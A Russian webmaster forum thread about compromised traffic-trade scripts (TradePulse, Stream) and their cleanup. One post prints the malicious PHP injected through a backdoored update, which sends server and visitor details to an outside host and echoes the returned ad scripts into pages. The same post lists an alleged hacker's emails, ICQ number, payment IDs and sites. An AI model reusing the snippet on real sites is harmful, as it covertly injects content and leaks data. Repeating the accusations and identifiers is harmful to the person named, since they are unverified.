На пенсии
С нами с 10.12.06
Сообщения: 4659
Рейтинг: 2370
|
 Добавлено: 17/02/12 в 19:16 |
Тут че надумал.. ни к кому странный трейдер не добавлялся или в вп новый юзер?
|
|
|
|
Payoneer-Бесплатная карта, быстрый вывод, низкие тарифы!|VDS
|
8
|
|
| |
местный
С нами с 10.08.03
Сообщения: 1578
Рейтинг: 2362
|
| Добавлено: 18/02/12 в 10:24 |
Насчет скриптов - стоял стрим ротатор, ат3.
Взлом был через стрим походу сделан.
Код вставлялся в самый конец после шаблона. Т.е. код был не в шаблоне, а походу в in.php или другом файле (не index.php). И показывался исключительно определенным странам. Для европейского ИП не показывался, а для американского показывался
|
|
|
|
| |
пьяный мастер
С нами с 06.09.05
Сообщения: 11946
Рейтинг: 5837
|
| Добавлено: 18/02/12 в 10:35 |
| xDiver писал: | | Взлом был через стрим походу сделан. |
а может через панель хостенга?  есть мнение что все панели дырявые...
|
|
|
|
| |
местный
С нами с 10.08.03
Сообщения: 1578
Рейтинг: 2362
|
| Добавлено: 18/02/12 в 11:43 |
Может и через панель, но я не нашел конкретно файла где стоит вредоностный код. Он вставлялся ровно после инклуда стрима в индексе. В шаблонах стрима, как я уже писал, пусто.
Решил проблему обновив стрим до последней версии, ну и перенес на свой сервер само собой с фрихоста
|
|
|
|
| |
С нами с 09.05.08
Сообщения: 225
Рейтинг: 155
|
| Добавлено: 25/02/12 в 00:33 |
кто подскажет, чем можно Trade Pulse заменить? заебался я с этими взломами, ломают только его. На сервере есть еще сайты, без Trade Pulse, никогда с ними проблем не было.
|
|
|
|
| |
+ +
клоны загельмахера
С нами с 11.10.08
Сообщения: 14532
Рейтинг: 1943
|
| Добавлено: 25/02/12 в 08:08 |
Crystal мне больше чем TP нра, я поменял давно ... правда сча хочу TradeX попробовать, дюже там лиц дешовые ...
так то в общем-то мне скрипты Килдозера нра тоже, но бля вечно с ними какаято хуйня, то домены прекспарятся с апдейтами и скрипты хуйни какой-то накачают, то ломают чета ...
хотя в данном случае наверно TP не причем ... не у всех же поломали
|
|
|
|
бандера придет - пизды огребет
|
4
|
|
| |
С нами с 13.09.04
Сообщения: 479
Рейтинг: 799
|
| Добавлено: 25/02/12 в 16:53 |
Тоже постоянно взламывали TP пару месяцев назад на нескольких сиджах, заменили все на Crystal, всё ок стало и сиджи выросли
|
|
|
|
| |
С нами с 01.10.05
Сообщения: 85
Рейтинг: 44
|
| Добавлено: 26/02/12 в 02:50 |
| SkyKiller писал: | Братцы, а вы вообще про .ftpaccess когда-нибудь слышали?  |
нет, раскажите пожалуйста, добрый человек
|
|
|
|
| |
С нами с 19.04.03
Сообщения: 4743
Рейтинг: 3194
|
| Добавлено: 26/02/12 в 14:39 |
| cdroller писал: |
так то в общем-то мне скрипты Килдозера нра тоже, но бля вечно с ними какаято хуйня, то домены прекспарятся с апдейтами и скрипты хуйни какой-то накачают, то ломают чета ...
|
помню давненько(кажется с протоном) был шум, что сливали процент с трафа на какое-то дерьмо ... проду подорвало сильно моим проектам, так обхожу стороной. Как видно не напрасно перебздел 
|
|
|
|
| |
пьяный мастер
С нами с 06.09.05
Сообщения: 11946
Рейтинг: 5837
|
| Добавлено: 26/02/12 в 14:52 |
мне из трейд скриптов больше всего arrowscripts нравится как траф раздает...
|
|
|
|
| |
С нами с 09.11.04
Сообщения: 319
Рейтинг: 499
|
| Добавлено: 26/02/12 в 15:01 |
Только собрался топик здесь новый создавать и увидел эту тему.
Все началось со взлома сервера моего партнера по проекту TradePulse в августе прошлого года.
Хакер влез на сервер, подсунул в дистрибутив скрипта бэкдор и распространил апдейт скрипта, заразив кучу серверов. Дальше был полный атас, столько грязи в свой адрес мы никогда не получали. Куча наших клиентов обвинили нас во всех смертных грехах, многие ушли от нас, кто-то потребовал материальной компенсации. Мы ДО СИХ ПОР чистим серверы клиентов от его дряни. Насколько я знаю этот же урод взломал скрипт GB Top несколько лет назад.
Стали разбираться что это за мразь это сделала. Чел особо не напрягался и ходил без проксей cо своей киргизской IP (у меня уже килобайты логов). Каждую строчку ниже я могу запруфить без проблем.
Если кто-то может пополнить список его данных - выкладывайте здесь, я думаю это будет полезно для всех. Вот что мы накопали:
Ники:
Nexxen
Nexxxen
Weber (не путать с нормальным вэбером )
Засвечен на хакерских форумах.
ICQ: 416906019
Мыла используемые мразью:
weber.poster@gmail.com
webex.post@gmail.com
weber@rbcmail.ru
zxxxz@rbcmail.ru
nexxxen@gmail.com - acc id в PayPal
WMID 101440429534. Персональный аттестат, получен в г. Бишкек, Киргизия.
https://passport.webmoney.ru/asp/certView.asp?wmid=101440429534
WMR кошелек R468875429910
Сайты урода:
gettraf.org - система 'раскрутки' сайтов
xtds.in - тдска
webexpress.name - бывший лол%%тный топ
crv.cc - раздача рекламы на зараженные сайты
cgi.bz - аналогично
hrv.bz - аналогично
Сайты хостятся у русского хостера x5x.ru, мои абузы они игнорят под предлогом 'мы проверили, ничего страшного у него не обнаружили'. Те еще уроды.
Реклама грузится таким способом:
| Код: [развернуть] | function getClientIP () {
if (isset ($_SERVER ['HTTP_X_FORWARDED_FOR'])){
$clientIP = $_SERVER ['HTTP_X_FORWARDED_FOR'];
}
elseif (isset ($_SERVER ['HTTP_X_REAL_IP'])){
$clientIP = $_SERVER ['HTTP_X_REAL_IP'];
}
else {
$clientIP = $_SERVER['REMOTE_ADDR'];
}
return $clientIP;
}
$cz = curl_init ();
curl_setopt ($cz , CURLOPT_URL , "http://hrv.bz/ny/?c=".getClientIP ()."&r=".$_SERVER['SCRIPT_FILENAME']."&s=".$_SERVER['SERVER_ADDR']."&h=@http://".$_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF']);
curl_setopt ($cz , CURLOPT_RETURNTRANSFER , 1 );
curl_setopt ($cz , CURLOPT_TIMEOUT, 6);
$nz = curl_exec($cz);
curl_close($cz);
echo $nz;
|
- выдача только для 'хороших стран' типа US, DE и тп.
Вот пример ответа с рекламой:
| Код: [развернуть] | {script src="http://www.trafficrevenue.net/loadad.js?username=inj"}{/script}
{script src="http://www.allabc.com/index.php?ref=code"}{/script} |
Владелец первого сайта оказался адекватным и забанил урода.
Владелец второго сайта на контакт не идет.
|
|
|
|
| |
Old Oil Barrel
С нами с 09.09.04
Сообщения: 58531
Рейтинг: 14265
|
| Добавлено: 26/02/12 в 16:20 |
домен регистратору его домены лочить не пробовали?
есть еще ведь ИКАН они я думаю такой безпредел терпеть не будут?
|
|
|
|
| |
С нами с 19.04.03
Сообщения: 4743
Рейтинг: 3194
|
| Добавлено: 26/02/12 в 16:27 |
+1 
|
|
|
|
| |
пьяный мастер
С нами с 06.09.05
Сообщения: 11946
Рейтинг: 5837
|
| Добавлено: 26/02/12 в 19:05 |
Kildoozer: новая версия TP безопасна или нет?
|
|
|
|
| |
+ +
клоны загельмахера
С нами с 11.10.08
Сообщения: 14532
Рейтинг: 1943
|
| Добавлено: 26/02/12 в 19:24 |
Нихуя се ... какой там ИКАН в пизду ... там по кошелькам и никам погуглить, так чел еще и ддосит кого-то там периодически ... сдать в ментовку все что накопаете и норм его примут, эт когда инфо нету то никто бегать искать не будет, а если все предоставить, то с руками оторвут, по телевизору хоть посмотрим на кренделя ... Если до этого никто не сподобится ему башку проломить ...
|
|
|
|
бандера придет - пизды огребет
|
15
|
|
| |
С нами с 09.11.04
Сообщения: 319
Рейтинг: 499
|
| Добавлено: 26/02/12 в 19:35 |
| X-dream писал: | | Kildoozer: новая версия TP безопасна или нет? |
Уже давно все безопасно.
Как говорится - нет худа без добра. Благодаря 'киргизу' мы переделали механизм обновлений скрипта, сделав его намного более секьюрным. Если не вдаваться в детали, то сейчас повторить 'апдейт' как в августе практически невозможно, для этого придется ломать сразу 3 независимых сервера.
Те 'хаки' что сейчас всплывают - это все отголоски того апдейта, в августе. Мы чистим серверы по первой просьбе, но порой откопать дыру на огромном сервере непросто. Даже если 1 файл мы пропустим, он потом все восстанавливает и распихивает свое дерьмо по новым папкам, шифруясь под нормальные скрипты.
Еще раз - все новые инсталляции абсолютно безопасны.
|
|
|
|
| |
пьяный мастер
С нами с 06.09.05
Сообщения: 11946
Рейтинг: 5837
|
| Добавлено: 26/02/12 в 23:19 |
| Kildoozer писал: | | но порой откопать дыру на огромном сервере непросто. Даже если 1 файл мы пропустим, он потом все восстанавливает и распихивает свое дерьмо по новым папкам, шифруясь под нормальные скрипты. |
хм...
ну вот я на дримхосте, пока TP не снёс с трех доменов, всё возвращалось. снёс тп, обновил вп, и вроде больше не возвращалось. потом перенес все на дедик, вроде нормально, ничего такого нету. тфу тфу тфу.
правильный админ = лучшая защита от хакеров )
|
|
|
|
| |
Криптопохуист
С нами с 05.04.03
Сообщения: 17158
Рейтинг: 6019
|
| Добавлено: 27/02/12 в 02:23 |
Грепнуть пхп файлы на предмет шелл вызовов и eval, грепнуть хтаксесы на предмет AddType. Пробежаться по списку созданных апачем файлов. И все бекдоры как на ладони даже в очень большой помойке.
Правда если хакер повысил привилегии - то можно идти об стену биться.
И разработчики скриптов: вот блять нельзя никак обойтись без шелл экзеков в веб-скриптах? Так бы в мод_пхп отключить шеллы вообще нахер и все. Ультимейт дефенс.
Но нет же, имажмажик надо вызывать шеллом а не апишкой! И обязательно через веб, не не через cli.
|
|
|
|
| |
С нами с 13.09.04
Сообщения: 479
Рейтинг: 799
|
| Добавлено: 27/02/12 в 15:10 |
| X-dream писал: | | пока TP не снёс с трех доменов, всё возвращалось |
та же самая фигня, пока ТР не снесли, всё возвращалось
|
|
|
|
| |
пьяный мастер
С нами с 06.09.05
Сообщения: 11946
Рейтинг: 5837
|
| Добавлено: 27/02/12 в 16:10 |
мне тп нравится как скрипт. в нем есть много фишек))
желаю овнерам - удачи, безопасности, и чтоб клиенты не уходили изза таких мелочей.
|
|
|
|
| |
С нами с 16.03.07
Сообщения: 2697
Рейтинг: 3147
|
| Добавлено: 27/02/12 в 22:58 |
да, было дело. подменял in.php в стриме (можно проверить, если вы знаете что у вас последняя версия но скрипт предлагает апдейт и апдейтит только файл in.php), подменял файлы-инклуды от линк органайзера, а этот инклуд был на всех сайтах
|
|
|
|
| |
ябудубудай
С нами с 20.02.07
Сообщения: 722
Рейтинг: 1038
|
| Добавлено: 28/02/12 в 12:54 |
Kildoozer скажите, а если раньше, на сайтах была реклама(не моя), после вирусного апдейта, потом эти скрипты проабгрейдил, до последней версии: 1.0.8 build 43 Вроде все чисто... Может ли остаться еще угрозы, что опять появится сторонняя реклама, и как вам отдать сервер для проверки, платно ли, и что для этого необходимо?!
|
|
|
|
| |
С нами с 13.08.07
Сообщения: 1089
Рейтинг: 1522
|
| Добавлено: 28/02/12 в 13:17 |
kildoozer(ГАВ)gmail.com
|
|
|
|
| |
С нами с 21.06.11
Сообщения: 392
Рейтинг: 216
|
| Добавлено: 03/03/12 в 07:13 |
Добрый вечер, товарищи, сегодня постучался человек, начал гуглить, так как каждого клиента проверяем и наткнулся на эту тему, что скажете?
"Здравствуйте, хотел бы обменять 6800 USD на Webmoney.
Статус аккаунта: Verified / Проверенный.
Счет зарегистрирован в Кувейте, Paypal-Email: nexxxen@gmail.com .
Средства зачислены с партнерки trafficrevenue.net. Мой WMID: 101440429534 .
Если требуются скины могу скинуть.
Какой процент сможете сделать под данную сумму?"
|
|
|
|
| |
На пенсии
С нами с 10.12.06
Сообщения: 4659
Рейтинг: 2370
|
| Добавлено: 03/03/12 в 09:34 |
Вот тема (Лечение!) Ахтунг атакуют топы или дыра GB Top полуторогодовалой давности с этого айпи 94.143.197.2 этот киргиз сломал топы и заразил все даже стрим и кристал. В итоге при заходе на сайт редиректило на фарму. Я потом нашел сайт с которого этот сука заливал бэкдоры отписал хостеру что мол у вас хакер все дела, а они тупо сказали что не могут контролировать каждого. Ну хули я им депешу что мол мои юристы собирают в отношении взлома моего сервера материалы и вы будите конфигурировать в деле как хост предоставлявший услуги хакеру. После этого сам овнер вышел на связь долго извинялся за своих дебилов сотрудников и просто снесли нах его сайт, хост и все прочее что было на нем.
|
|
|
|
Payoneer-Бесплатная карта, быстрый вывод, низкие тарифы!|VDS
|
0
|
|
| |
